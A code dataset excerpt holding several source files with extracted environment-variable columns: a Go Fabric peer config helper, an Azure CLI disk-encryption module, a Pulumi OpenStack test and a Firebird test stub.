"github.com/mcc-github/blockchain/bccsp/factory"
"github.com/mcc-github/blockchain/common/channelconfig"
"github.com/mcc-github/blockchain/common/flogging"
"github.com/mcc-github/blockchain/core/comm"
"github.com/mcc-github/blockchain/core/config"
"github.com/mcc-github/blockchain/core/scc/cscc"
"github.com/mcc-github/blockchain/msp"
mspmgmt "github.com/mcc-github/blockchain/msp/mgmt"
"github.com/mcc-github/blockchain/protoutil"
"github.com/mitchellh/mapstructure"
"github.com/pkg/errors"
"github.com/spf13/cobra"
"github.com/spf13/viper"
)
const UndefinedParamValue = ""
const CmdRoot = "core"
var mainLogger = flogging.MustGetLogger("main")
var logOutput = os.Stderr
var (
defaultConnTimeout = 3 * time.Second
GetEndorserClientFnc func(address, tlsRootCertFile string) (pb.EndorserClient, error)
GetPeerDeliverClientFnc func(address, tlsRootCertFile string) (pb.DeliverClient, error)
GetDeliverClientFnc func(address, tlsRootCertFile string) (pb.Deliver_DeliverClient, error)
GetDefaultSignerFnc func() (msp.SigningIdentity, error)
GetBroadcastClientFnc func() (BroadcastClient, error)
GetOrdererEndpointOfChainFnc func(chainID string, signer Signer,
endorserClient pb.EndorserClient) ([]string, error)
GetCertificateFnc func() (tls.Certificate, error)
)
type CommonClient struct {
*comm.GRPCClient
Address string
sn string
}
func init() {
GetEndorserClientFnc = GetEndorserClient
GetDefaultSignerFnc = GetDefaultSigner
GetBroadcastClientFnc = GetBroadcastClient
GetOrdererEndpointOfChainFnc = GetOrdererEndpointOfChain
GetDeliverClientFnc = GetDeliverClient
GetPeerDeliverClientFnc = GetPeerDeliverClient
GetCertificateFnc = GetCertificate
}
func InitConfig(cmdRoot string) error {
err := config.InitViper(nil, cmdRoot)
if err != nil {
return err
}
err = viper.ReadInConfig()
if err != nil {
if strings.Contains(fmt.Sprint(err), "Unsupported Config Type") {
return errors.New(fmt.Sprintf("Could not find config file. "+
"Please make sure that FABRIC_CFG_PATH is set to a path "+
"which contains %s.yaml", cmdRoot))
} else {
return errors.WithMessagef(err, "error when reading %s config file", cmdRoot)
}
}
return nil
}
func InitCrypto(mspMgrConfigDir, localMSPID, localMSPType string) error {
fi, err := os.Stat(mspMgrConfigDir)
if os.IsNotExist(err) || !fi.IsDir() {
return errors.Errorf("cannot init crypto, folder \"%s\" does not exist", mspMgrConfigDir)
}
if localMSPID == "" {
return errors.New("the local MSP must have an ID")
}
SetBCCSPKeystorePath()
bccspConfig := factory.GetDefaultOpts()
if config := viper.Get("peer.BCCSP"); config != nil {
err = mapstructure.Decode(config, bccspConfig)
if err != nil {
return errors.WithMessage(err, "could not decode peer BCCSP configuration")
}
}
err = mspmgmt.LoadLocalMspWithType(mspMgrConfigDir, bccspConfig, localMSPID, localMSPType)
if err != nil {
return errors.WithMessagef(err, "error when setting up MSP of type %s from directory %s", localMSPType, mspMgrConfigDir)
}
return nil
}
func SetBCCSPKeystorePath() {
viper.Set("peer.BCCSP.SW.FileKeyStore.KeyStore",
config.GetPath("peer.BCCSP.SW.FileKeyStore.KeyStore"))
}
func GetDefaultSigner() (msp.SigningIdentity, error) {
signer, err := mspmgmt.GetLocalMSP().GetDefaultSigningIdentity()
if err != nil {
return nil, errors.WithMessage(err, "error obtaining the default signing identity")
}
return signer, err
}
type Signer interface {
Sign(msg []byte) ([]byte, error)
Serialize() ([]byte, error)
}
func GetOrdererEndpointOfChain(chainID string, signer Signer, endorserClient pb.EndorserClient) ([]string, error) {
invocation := &pb.ChaincodeInvocationSpec{
ChaincodeSpec: &pb.ChaincodeSpec{
Type: pb.ChaincodeSpec_Type(pb.ChaincodeSpec_Type_value["GOLANG"]),
ChaincodeId: &pb.ChaincodeID{Name: "cscc"},
Input: &pb.ChaincodeInput{Args: [][]byte{[]byte(cscc.GetConfigBlock), []byte(chainID)}},
},
}
creator, err := signer.Serialize()
if err != nil {
return nil, errors.WithMessage(err, "error serializing identity for signer")
}
prop, _, err := protoutil.CreateProposalFromCIS(pcommon.HeaderType_CONFIG, "", invocation, creator)
if err != nil {
return nil, errors.WithMessage(err, "error creating GetConfigBlock proposal")
}
signedProp, err := protoutil.GetSignedProposal(prop, signer)
if err != nil {
return nil, errors.WithMessage(err, "error creating signed GetConfigBlock proposal")
}
proposalResp, err := endorserClient.ProcessProposal(context.Background(), signedProp)
if err != nil {
return nil, errors.WithMessage(err, "error endorsing GetConfigBlock")
}
if proposalResp == nil {
return nil, errors.WithMessage(err, "error nil proposal response")
}
if proposalResp.Response.Status != 0 && proposalResp.Response.Status != 200 {
return nil, errors.Errorf("error bad proposal response %d: %s", proposalResp.Response.Status, proposalResp.Response.Message)
}
block, err := protoutil.UnmarshalBlock(proposalResp.Response.Payload)
if err != nil {
return nil, errors.WithMessage(err, "error unmarshaling config block")
}
envelopeConfig, err := protoutil.ExtractEnvelope(block, 0)
if err != nil {
return nil, errors.WithMessage(err, "error extracting config block envelope")
}
bundle, err := channelconfig.NewBundleFromEnvelope(envelopeConfig, factory.GetDefault())
if err != nil {
return nil, errors.WithMessage(err, "error loading config block")
}
return bundle.ChannelConfig().OrdererAddresses(), nil
}
func CheckLogLevel(level string) error {
if !flogging.IsValidLevel(level) {
return errors.Errorf("invalid log level provided - %s", level)
}
return nil
}
func configFromEnv(prefix string) (address, override string, clientConfig comm.ClientConfig, err error) {
address = viper.GetString(prefix + ".address")
override = viper.GetString(prefix + ".tls.serverhostoverride")
clientConfig = comm.ClientConfig{}
connTimeout := viper.GetDuration(prefix + ".client.connTimeout")
if connTimeout == time.Duration(0) {
connTimeout = defaultConnTimeout
}
clientConfig.Timeout = connTimeout
secOpts := comm.SecureOptions{
UseTLS: viper.GetBool(prefix + ".tls.enabled"),
RequireClientCert: viper.GetBool(prefix + ".tls.clientAuthRequired")}
if secOpts.UseTLS {
caPEM, res := ioutil.ReadFile(config.GetPath(prefix + ".tls.rootcert.file"))
if res != nil {
err = errors.WithMessage(res,
fmt.Sprintf("unable to load %s.tls.rootcert.file", prefix))
return
}
secOpts.ServerRootCAs = [][]byte{caPEM}
}
if secOpts.RequireClientCert {
keyPEM, res := ioutil.ReadFile(config.GetPath(prefix + ".tls.clientKey.file"))
if res != nil {
err = errors.WithMessage(res,
fmt.Sprintf("unable to load %s.tls.clientKey.file", prefix))
return
}
secOpts.Key = keyPEM
certPEM, res := ioutil.ReadFile(config.GetPath(prefix + ".tls.clientCert.file"))
if res != nil {
err = errors.WithMessage(res,
fmt.Sprintf("unable to load %s.tls.clientCert.file", prefix))
return
}
secOpts.Certificate = certPEM
}
clientConfig.SecOpts = secOpts
return
}
func InitCmd(cmd *cobra.Command, args []string) {
err := InitConfig(CmdRoot)
if err != nil {
mainLogger.Errorf("Fatal error when initializing %s config : %s", CmdRoot, err)
os.Exit(1)
}
var loggingLevel string
if viper.GetString("logging_level") != "" {
loggingLevel = viper.GetString("logging_level")
} else {
loggingLevel = viper.GetString("logging.level")
}
if loggingLevel != "" {
mainLogger.Warning("CORE_LOGGING_LEVEL is no longer supported, please use the FABRIC_LOGGING_SPEC environment variable")
}
loggingSpec := os.Getenv("FABRIC_LOGGING_SPEC")
loggingFormat := os.Getenv("FABRIC_LOGGING_FORMAT")
flogging.Init(flogging.Config{
Format: loggingFormat,
Writer: logOutput,
LogSpec: loggingSpec,
})
var mspMgrConfigDir = config.GetPath("peer.mspConfigPath")
var mspID = viper.GetString("peer.localMspId")
var mspType = viper.GetString("peer.localMspType")
if mspType == "" {
mspType = msp.ProviderTypeToString(msp.FABRIC)
}
err = InitCrypto(mspMgrConfigDir, mspID, mspType)
if err != nil {
mainLogger.Errorf("Cannot run peer because %s", err.Error())
os.Exit(1)
}
runtime.GOMAXPROCS(viper.GetInt("peer.gomaxprocs"))
}
|
[
"\"FABRIC_LOGGING_SPEC\"",
"\"FABRIC_LOGGING_FORMAT\""
] |
[] |
[
"FABRIC_LOGGING_SPEC",
"FABRIC_LOGGING_FORMAT"
] |
[]
|
["FABRIC_LOGGING_SPEC", "FABRIC_LOGGING_FORMAT"]
|
go
| 2 | 0 | |
src/azure-cli/azure/cli/command_modules/vm/disk_encryption.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import uuid
import os
from knack.log import get_logger
from azure.cli.core.commands import LongRunningOperation
from azure.cli.command_modules.vm.custom import set_vm, _compute_client_factory, _is_linux_os
from azure.cli.command_modules.vm._vm_utils import get_key_vault_base_url, create_keyvault_data_plane_client
_DATA_VOLUME_TYPE = 'DATA'
_ALL_VOLUME_TYPE = 'ALL'
_STATUS_ENCRYPTED = 'Encrypted'
logger = get_logger(__name__)
vm_extension_info = {
'Linux': {
'publisher': os.environ.get('ADE_TEST_EXTENSION_PUBLISHER') or 'Microsoft.Azure.Security',
'name': os.environ.get('ADE_TEST_EXTENSION_NAME') or 'AzureDiskEncryptionForLinux',
'version': '1.1',
'legacy_version': '0.1'
},
'Windows': {
'publisher': os.environ.get('ADE_TEST_EXTENSION_PUBLISHER') or 'Microsoft.Azure.Security',
'name': os.environ.get('ADE_TEST_EXTENSION_NAME') or 'AzureDiskEncryption',
'version': '2.2',
'legacy_version': '1.1'
}
}
def _find_existing_ade(vm, use_instance_view=False, ade_ext_info=None):
if not ade_ext_info:
ade_ext_info = vm_extension_info['Linux'] if _is_linux_os(vm) else vm_extension_info['Windows']
if use_instance_view:
exts = vm.instance_view.extensions or []
r = next((e for e in exts if e.type and e.type.lower().startswith(ade_ext_info['publisher'].lower()) and
e.name.lower() == ade_ext_info['name'].lower()), None)
else:
exts = vm.resources or []
r = next((e for e in exts if (e.publisher.lower() == ade_ext_info['publisher'].lower() and
e.virtual_machine_extension_type.lower() == ade_ext_info['name'].lower())), None)
return r
def _detect_ade_status(vm):
if vm.storage_profile.os_disk.encryption_settings:
return False, True
ade_ext_info = vm_extension_info['Linux'] if _is_linux_os(vm) else vm_extension_info['Windows']
ade = _find_existing_ade(vm, ade_ext_info=ade_ext_info)
if ade is None:
return False, False
if ade.type_handler_version.split('.')[0] == ade_ext_info['legacy_version'].split('.')[0]:
return False, True
return True, False # we believe impossible to have both old & new ADE
def encrypt_vm(cmd, resource_group_name, vm_name, # pylint: disable=too-many-locals, too-many-statements
disk_encryption_keyvault,
aad_client_id=None,
aad_client_secret=None, aad_client_cert_thumbprint=None,
key_encryption_keyvault=None,
key_encryption_key=None,
key_encryption_algorithm='RSA-OAEP',
volume_type=None,
encrypt_format_all=False,
force=False):
from msrestazure.tools import parse_resource_id
from knack.util import CLIError
# pylint: disable=no-member
compute_client = _compute_client_factory(cmd.cli_ctx)
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
is_linux = _is_linux_os(vm)
backup_encryption_settings = vm.storage_profile.os_disk.encryption_settings
vm_encrypted = backup_encryption_settings.enabled if backup_encryption_settings else False
_, has_old_ade = _detect_ade_status(vm)
use_new_ade = not aad_client_id and not has_old_ade
extension = vm_extension_info['Linux' if is_linux else 'Windows']
if not use_new_ade and not aad_client_id:
raise CLIError('Please provide --aad-client-id')
# 1. First validate arguments
if not use_new_ade and not aad_client_cert_thumbprint and not aad_client_secret:
raise CLIError('Please provide either --aad-client-cert-thumbprint or --aad-client-secret')
if volume_type is None:
if not is_linux:
volume_type = _ALL_VOLUME_TYPE
elif vm.storage_profile.data_disks:
raise CLIError('VM has data disks, please supply --volume-type')
else:
volume_type = 'OS'
# sequence_version should be unique
sequence_version = uuid.uuid4()
# retrieve keyvault details
disk_encryption_keyvault_url = get_key_vault_base_url(
cmd.cli_ctx, (parse_resource_id(disk_encryption_keyvault))['name'])
# disk encryption key itself can be further protected, so let us verify
if key_encryption_key:
key_encryption_keyvault = key_encryption_keyvault or disk_encryption_keyvault
# to avoid bad server errors, ensure the vault has the right configurations
_verify_keyvault_good_for_encryption(cmd.cli_ctx, disk_encryption_keyvault, key_encryption_keyvault, vm, force)
# if key name and not key url, get url.
if key_encryption_key and '://' not in key_encryption_key: # if key name and not key url
key_encryption_key = _get_keyvault_key_url(
cmd.cli_ctx, (parse_resource_id(key_encryption_keyvault))['name'], key_encryption_key)
# 2. we are ready to provision/update the disk encryption extensions
# The following logic was mostly ported from xplat-cli
public_config = {
'KeyVaultURL': disk_encryption_keyvault_url,
'VolumeType': volume_type,
'EncryptionOperation': 'EnableEncryption' if not encrypt_format_all else 'EnableEncryptionFormatAll',
'KeyEncryptionKeyURL': key_encryption_key,
'KeyEncryptionAlgorithm': key_encryption_algorithm,
'SequenceVersion': sequence_version,
}
if use_new_ade:
public_config.update({
"KeyVaultResourceId": disk_encryption_keyvault,
"KekVaultResourceId": key_encryption_keyvault if key_encryption_key else '',
})
else:
public_config.update({
'AADClientID': aad_client_id,
'AADClientCertThumbprint': aad_client_cert_thumbprint,
})
ade_legacy_private_config = {
'AADClientSecret': aad_client_secret if is_linux else (aad_client_secret or '')
}
VirtualMachineExtension, DiskEncryptionSettings, KeyVaultSecretReference, KeyVaultKeyReference, SubResource = \
cmd.get_models('VirtualMachineExtension', 'DiskEncryptionSettings', 'KeyVaultSecretReference',
'KeyVaultKeyReference', 'SubResource')
ext = VirtualMachineExtension(
location=vm.location, # pylint: disable=no-member
publisher=extension['publisher'],
virtual_machine_extension_type=extension['name'],
protected_settings=None if use_new_ade else ade_legacy_private_config,
type_handler_version=extension['version'] if use_new_ade else extension['legacy_version'],
settings=public_config,
auto_upgrade_minor_version=True)
poller = compute_client.virtual_machine_extensions.create_or_update(
resource_group_name, vm_name, extension['name'], ext)
LongRunningOperation(cmd.cli_ctx)(poller)
poller.result()
# verify the extension was ok
extension_result = compute_client.virtual_machine_extensions.get(
resource_group_name, vm_name, extension['name'], 'instanceView')
if extension_result.provisioning_state != 'Succeeded':
raise CLIError('Extension needed for disk encryption was not provisioned correctly')
if not use_new_ade:
if not (extension_result.instance_view.statuses and
extension_result.instance_view.statuses[0].message):
raise CLIError('Could not find url pointing to the secret for disk encryption')
# 3. update VM's storage profile with the secrets
status_url = extension_result.instance_view.statuses[0].message
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
secret_ref = KeyVaultSecretReference(secret_url=status_url,
source_vault=SubResource(id=disk_encryption_keyvault))
key_encryption_key_obj = None
if key_encryption_key:
key_encryption_key_obj = KeyVaultKeyReference(key_url=key_encryption_key,
source_vault=SubResource(id=key_encryption_keyvault))
disk_encryption_settings = DiskEncryptionSettings(disk_encryption_key=secret_ref,
key_encryption_key=key_encryption_key_obj,
enabled=True)
if vm_encrypted:
# stop the vm before update if the vm is already encrypted
logger.warning("Deallocating the VM before updating encryption settings...")
compute_client.virtual_machines.deallocate(resource_group_name, vm_name).result()
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
vm.storage_profile.os_disk.encryption_settings = disk_encryption_settings
set_vm(cmd, vm)
if vm_encrypted:
# and start after the update
logger.warning("Restarting the VM after the update...")
compute_client.virtual_machines.start(resource_group_name, vm_name).result()
if is_linux and volume_type != _DATA_VOLUME_TYPE:
old_ade_msg = "If you see 'VMRestartPending', please restart the VM, and the encryption will finish shortly"
logger.warning("The encryption request was accepted. Please use 'show' command to monitor "
"the progress. %s", "" if use_new_ade else old_ade_msg)
def decrypt_vm(cmd, resource_group_name, vm_name, volume_type=None, force=False):
from knack.util import CLIError
compute_client = _compute_client_factory(cmd.cli_ctx)
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
has_new_ade, has_old_ade = _detect_ade_status(vm)
if not has_new_ade and not has_old_ade:
logger.warning('Azure Disk Encryption is not enabled')
return
is_linux = _is_linux_os(vm)
# pylint: disable=no-member
# 1. be nice, figure out the default volume type and also verify VM will not be busted
if is_linux:
if volume_type:
if not force and volume_type != _DATA_VOLUME_TYPE:
raise CLIError("Only Data disks can have encryption disabled in a Linux VM. "
"Use '--force' to ignore the warning")
else:
volume_type = _DATA_VOLUME_TYPE
elif volume_type is None:
volume_type = _ALL_VOLUME_TYPE
extension = vm_extension_info['Linux' if is_linux else 'Windows']
# sequence_version should be incremented since encryptions occurred before
sequence_version = uuid.uuid4()
# 2. update the disk encryption extension
# The following logic was mostly ported from xplat-cli
public_config = {
'VolumeType': volume_type,
'EncryptionOperation': 'DisableEncryption',
'SequenceVersion': sequence_version,
}
VirtualMachineExtension, DiskEncryptionSettings = cmd.get_models(
'VirtualMachineExtension', 'DiskEncryptionSettings')
ext = VirtualMachineExtension(
location=vm.location, # pylint: disable=no-member
publisher=extension['publisher'],
virtual_machine_extension_type=extension['name'],
type_handler_version=extension['version'] if has_new_ade else extension['legacy_version'],
settings=public_config,
auto_upgrade_minor_version=True)
poller = compute_client.virtual_machine_extensions.create_or_update(resource_group_name,
vm_name,
extension['name'], ext)
LongRunningOperation(cmd.cli_ctx)(poller)
poller.result()
extension_result = compute_client.virtual_machine_extensions.get(resource_group_name, vm_name,
extension['name'],
'instanceView')
if extension_result.provisioning_state != 'Succeeded':
raise CLIError("Extension updating didn't succeed")
if not has_new_ade:
# 3. Remove the secret from VM's storage profile
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
disk_encryption_settings = DiskEncryptionSettings(enabled=False)
vm.storage_profile.os_disk.encryption_settings = disk_encryption_settings
set_vm(cmd, vm)
def _show_vm_encryption_status_thru_new_ade(vm_instance_view):
ade = _find_existing_ade(vm_instance_view, use_instance_view=True)
disk_infos = []
for div in vm_instance_view.instance_view.disks or []:
disk_infos.append({
'name': div.name,
'encryptionSettings': div.encryption_settings,
'statuses': [x for x in (div.statuses or []) if (x.code or '').startswith('EncryptionState')],
})
return {
'status': ade.statuses if ade else None,
'substatus': ade.substatuses if ade else None,
'disks': disk_infos
}
def show_vm_encryption_status(cmd, resource_group_name, vm_name):
encryption_status = {
'osDisk': 'NotEncrypted',
'osDiskEncryptionSettings': None,
'dataDisk': 'NotEncrypted',
'osType': None
}
compute_client = _compute_client_factory(cmd.cli_ctx)
vm = compute_client.virtual_machines.get(resource_group_name, vm_name, 'instanceView')
has_new_ade, has_old_ade = _detect_ade_status(vm)
if not has_new_ade and not has_old_ade:
logger.warning('Azure Disk Encryption is not enabled')
return None
if has_new_ade:
return _show_vm_encryption_status_thru_new_ade(vm)
is_linux = _is_linux_os(vm)
# pylint: disable=no-member
# The following logic was mostly ported from xplat-cli
os_type = 'Linux' if is_linux else 'Windows'
encryption_status['osType'] = os_type
extension = vm_extension_info[os_type]
extension_result = compute_client.virtual_machine_extensions.get(resource_group_name,
vm_name,
extension['name'],
'instanceView')
logger.debug(extension_result)
if extension_result.instance_view and extension_result.instance_view.statuses:
encryption_status['progressMessage'] = extension_result.instance_view.statuses[0].message
substatus_message = None
if getattr(extension_result.instance_view, 'substatuses', None):
substatus_message = extension_result.instance_view.substatuses[0].message
encryption_status['osDiskEncryptionSettings'] = vm.storage_profile.os_disk.encryption_settings
import json
if is_linux:
try:
message_object = json.loads(substatus_message)
except Exception: # pylint: disable=broad-except
message_object = None # might be from outdated extension
if message_object and ('os' in message_object):
encryption_status['osDisk'] = message_object['os']
else:
encryption_status['osDisk'] = 'Unknown'
if message_object and 'data' in message_object:
encryption_status['dataDisk'] = message_object['data']
else:
encryption_status['dataDisk'] = 'Unknown'
else:
# Windows - get os and data volume encryption state from the vm model
if (encryption_status['osDiskEncryptionSettings'] and
encryption_status['osDiskEncryptionSettings'].enabled and
encryption_status['osDiskEncryptionSettings'].disk_encryption_key and
encryption_status['osDiskEncryptionSettings'].disk_encryption_key.secret_url):
encryption_status['osDisk'] = _STATUS_ENCRYPTED
else:
encryption_status['osDisk'] = 'Unknown'
if extension_result.provisioning_state == 'Succeeded':
volume_type = extension_result.settings.get('VolumeType', None)
about_data_disk = not volume_type or volume_type.lower() != 'os'
if about_data_disk and extension_result.settings.get('EncryptionOperation', None) == 'EnableEncryption':
encryption_status['dataDisk'] = _STATUS_ENCRYPTED
return encryption_status
def _get_keyvault_key_url(cli_ctx, keyvault_name, key_name):
client = create_keyvault_data_plane_client(cli_ctx)
result = client.get_key(get_key_vault_base_url(cli_ctx, keyvault_name), key_name, '')
return result.key.kid # pylint: disable=no-member
def _handles_default_volume_type_for_vmss_encryption(is_linux, volume_type, force):
if is_linux:
volume_type = volume_type or _DATA_VOLUME_TYPE
if volume_type != _DATA_VOLUME_TYPE:
msg = 'OS disk encyrption is not yet supported for Linux VM scale sets'
if force:
logger.warning(msg)
else:
from knack.util import CLIError
raise CLIError(msg)
else:
volume_type = volume_type or _ALL_VOLUME_TYPE
return volume_type
def encrypt_vmss(cmd, resource_group_name, vmss_name, # pylint: disable=too-many-locals, too-many-statements
disk_encryption_keyvault,
key_encryption_keyvault=None,
key_encryption_key=None,
key_encryption_algorithm='RSA-OAEP',
volume_type=None,
force=False):
from msrestazure.tools import parse_resource_id
# pylint: disable=no-member
UpgradeMode, VirtualMachineScaleSetExtension, VirtualMachineScaleSetExtensionProfile = cmd.get_models(
'UpgradeMode', 'VirtualMachineScaleSetExtension', 'VirtualMachineScaleSetExtensionProfile')
compute_client = _compute_client_factory(cmd.cli_ctx)
vmss = compute_client.virtual_machine_scale_sets.get(resource_group_name, vmss_name)
is_linux = _is_linux_os(vmss.virtual_machine_profile)
extension = vm_extension_info['Linux' if is_linux else 'Windows']
# 1. First validate arguments
volume_type = _handles_default_volume_type_for_vmss_encryption(is_linux, volume_type, force)
# retrieve keyvault details
disk_encryption_keyvault_url = get_key_vault_base_url(cmd.cli_ctx,
(parse_resource_id(disk_encryption_keyvault))['name'])
# disk encryption key itself can be further protected, so let us verify
if key_encryption_key:
key_encryption_keyvault = key_encryption_keyvault or disk_encryption_keyvault
# to avoid bad server errors, ensure the vault has the right configurations
_verify_keyvault_good_for_encryption(cmd.cli_ctx, disk_encryption_keyvault, key_encryption_keyvault, vmss, force)
# if key name and not key url, get url.
if key_encryption_key and '://' not in key_encryption_key:
key_encryption_key = _get_keyvault_key_url(
cmd.cli_ctx, (parse_resource_id(key_encryption_keyvault))['name'], key_encryption_key)
# 2. we are ready to provision/update the disk encryption extensions
public_config = {
'KeyVaultURL': disk_encryption_keyvault_url,
'KeyEncryptionKeyURL': key_encryption_key or '',
"KeyVaultResourceId": disk_encryption_keyvault,
"KekVaultResourceId": key_encryption_keyvault if key_encryption_key else '',
'KeyEncryptionAlgorithm': key_encryption_algorithm if key_encryption_key else '',
'VolumeType': volume_type,
'EncryptionOperation': 'EnableEncryption'
}
ext = VirtualMachineScaleSetExtension(name=extension['name'],
publisher=extension['publisher'],
type1=extension['name'],
type_handler_version=extension['version'],
settings=public_config,
auto_upgrade_minor_version=True,
force_update_tag=uuid.uuid4())
exts = [ext]
# remove any old ade extensions set by this command and add the new one.
vmss_ext_profile = vmss.virtual_machine_profile.extension_profile
if vmss_ext_profile and vmss_ext_profile.extensions:
exts.extend(old_ext for old_ext in vmss.virtual_machine_profile.extension_profile.extensions
if old_ext.type != ext.type or old_ext.name != ext.name)
vmss.virtual_machine_profile.extension_profile = VirtualMachineScaleSetExtensionProfile(extensions=exts)
# Avoid unnecessary permission error
vmss.virtual_machine_profile.storage_profile.image_reference = None
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name, vmss_name, vmss)
LongRunningOperation(cmd.cli_ctx)(poller)
_show_post_action_message(resource_group_name, vmss.name, vmss.upgrade_policy.mode == UpgradeMode.manual, True)
def decrypt_vmss(cmd, resource_group_name, vmss_name, volume_type=None, force=False):
UpgradeMode, VirtualMachineScaleSetExtension = cmd.get_models('UpgradeMode', 'VirtualMachineScaleSetExtension')
compute_client = _compute_client_factory(cmd.cli_ctx)
vmss = compute_client.virtual_machine_scale_sets.get(resource_group_name, vmss_name)
is_linux = _is_linux_os(vmss.virtual_machine_profile)
extension = vm_extension_info['Linux' if is_linux else 'Windows']
# 1. be nice, figure out the default volume type
volume_type = _handles_default_volume_type_for_vmss_encryption(is_linux, volume_type, force)
# 2. update the disk encryption extension
public_config = {
'VolumeType': volume_type,
'EncryptionOperation': 'DisableEncryption',
}
ext = VirtualMachineScaleSetExtension(name=extension['name'],
publisher=extension['publisher'],
type1=extension['name'],
type_handler_version=extension['version'],
settings=public_config,
auto_upgrade_minor_version=True,
force_update_tag=uuid.uuid4())
if (not vmss.virtual_machine_profile.extension_profile or
not vmss.virtual_machine_profile.extension_profile.extensions):
extensions = []
else:
extensions = vmss.virtual_machine_profile.extension_profile.extensions
ade_extension = [x for x in extensions if
x.type1.lower() == extension['name'].lower() and x.publisher.lower() == extension['publisher'].lower()] # pylint: disable=line-too-long
if not ade_extension:
from knack.util import CLIError
raise CLIError("VM scale set '{}' was not encrypted".format(vmss_name))
index = vmss.virtual_machine_profile.extension_profile.extensions.index(ade_extension[0])
vmss.virtual_machine_profile.extension_profile.extensions[index] = ext
# Avoid unnecessary permission error
vmss.virtual_machine_profile.storage_profile.image_reference = None
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name, vmss_name, vmss)
LongRunningOperation(cmd.cli_ctx)(poller)
_show_post_action_message(resource_group_name, vmss.name, vmss.upgrade_policy.mode == UpgradeMode.manual, False)
def _show_post_action_message(resource_group_name, vmss_name, maunal_mode, enable):
msg = ''
if maunal_mode:
msg = ("With manual upgrade mode, you will need to run 'az vmss update-instances -g {} -n {} "
"--instance-ids \"*\"' to propagate the change.\n".format(resource_group_name, vmss_name))
msg += ("Note, {} encryption will take a while to finish. Please query the status using "
"'az vmss encryption show -g {} -n {}'. For Linux VM, you will lose the access during the period".format(
'enabling' if enable else 'disabling', resource_group_name, vmss_name))
logger.warning(msg)
def show_vmss_encryption_status(cmd, resource_group_name, vmss_name):
client = _compute_client_factory(cmd.cli_ctx)
vm_instances = list(client.virtual_machine_scale_set_vms.list(resource_group_name, vmss_name,
select='instanceView', expand='instanceView'))
result = []
for instance in vm_instances:
view = instance.instance_view
disk_infos = []
vm_enc_info = {
'id': instance.id,
'disks': disk_infos
}
for div in view.disks:
disk_infos.append({
'name': div.name,
'encryptionSettings': div.encryption_settings,
'statuses': [x for x in (div.statuses or []) if (x.code or '').startswith('EncryptionState')]
})
result.append(vm_enc_info)
return result
def _verify_keyvault_good_for_encryption(cli_ctx, disk_vault_id, kek_vault_id, vm_or_vmss, force):
def _report_client_side_validation_error(msg):
if force:
logger.warning("WARNING: %s %s", msg, "Encryption might fail.")
else:
from knack.util import CLIError
raise CLIError("ERROR: {}".format(msg))
resource_type = "VMSS" if vm_or_vmss.type.lower().endswith("virtualmachinescalesets") else "VM"
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import ResourceType
from msrestazure.tools import parse_resource_id
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_KEYVAULT).vaults
disk_vault_resource_info = parse_resource_id(disk_vault_id)
key_vault = client.get(disk_vault_resource_info['resource_group'], disk_vault_resource_info['name'])
# ensure vault has 'EnabledForDiskEncryption' permission
if not key_vault.properties or not key_vault.properties.enabled_for_disk_encryption:
_report_client_side_validation_error("Keyvault '{}' is not enabled for disk encryption.".format(
disk_vault_resource_info['resource_name']))
if kek_vault_id:
kek_vault_info = parse_resource_id(kek_vault_id)
if disk_vault_resource_info['name'].lower() != kek_vault_info['name'].lower():
client.get(kek_vault_info['resource_group'], kek_vault_info['name'])
# verify subscription mataches
vm_vmss_resource_info = parse_resource_id(vm_or_vmss.id)
if vm_vmss_resource_info['subscription'].lower() != disk_vault_resource_info['subscription'].lower():
_report_client_side_validation_error("{} {}'s subscription does not match keyvault's subscription."
.format(resource_type, vm_vmss_resource_info['name']))
# verify region matches
if key_vault.location.replace(' ', '').lower() != vm_or_vmss.location.replace(' ', '').lower():
_report_client_side_validation_error(
"{} {}'s region does not match keyvault's region.".format(resource_type, vm_vmss_resource_info['name']))
|
[] |
[] |
[
"ADE_TEST_EXTENSION_PUBLISHER",
"ADE_TEST_EXTENSION_NAME"
] |
[]
|
["ADE_TEST_EXTENSION_PUBLISHER", "ADE_TEST_EXTENSION_NAME"]
|
python
| 2 | 0 | |
examples/examples_test.go
|
// Copyright 2016-2017, Pulumi Corporation. All rights reserved.
package examples
import (
"os"
"testing"
"github.com/pulumi/pulumi/pkg/v3/testing/integration"
)
func checkAuthUrl(t *testing.T) {
authUrl := os.Getenv("OS_AUTH_URL")
if authUrl == "" {
t.Skipf("Skipping test due to missing OS_AUTH_URL environment variable")
}
}
func getCwd(t *testing.T) string {
cwd, err := os.Getwd()
if err != nil {
t.FailNow()
}
return cwd
}
func getBaseOptions() integration.ProgramTestOptions {
return integration.ProgramTestOptions{
// One change is known to occur during refresh of the resources in this example:
// `~ openstack:compute:Instance test updated changes: + blockDevices,personalities,schedulerHints``
ExpectRefreshChanges: true,
}
}
|
[
"\"OS_AUTH_URL\""
] |
[] |
[
"OS_AUTH_URL"
] |
[]
|
["OS_AUTH_URL"]
|
go
| 1 | 0 | |
tests/bugs/core_4899_test.py
|
#coding:utf-8
#
# id: bugs.core_4899
# title: GFIX -online: message "IProvider::attachDatabase failed when loading mapping cache" appears in Classic (only) if access uses remote protocol
# decription:
#
# tracker_id: CORE-4899
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('^((?!Attributes).)*$', ''), ('[\t]+', ' ')]
init_script_1 = """"""
db_1 = db_factory(page_size=4096, sql_dialect=3, init=init_script_1)
# test_script_1
#---
#
# import os
#
# os.environ["ISC_USER"] = user_name
# os.environ["ISC_PASSWORD"] = user_password
#
# db_conn.close()
#
# fdb='$(DATABASE_LOCATION)bugs.core_4899.fdb'
# fdx=os.path.join(context['temp_directory'],'tmp_copy_4899.fdb')
#
# if os.path.isfile(fdx):
# os.remove(fdx)
#
# script="create database 'localhost:%s';" % fdx
# runProgram('isql',['-q'],script)
# # --------------------- I ----------------
#
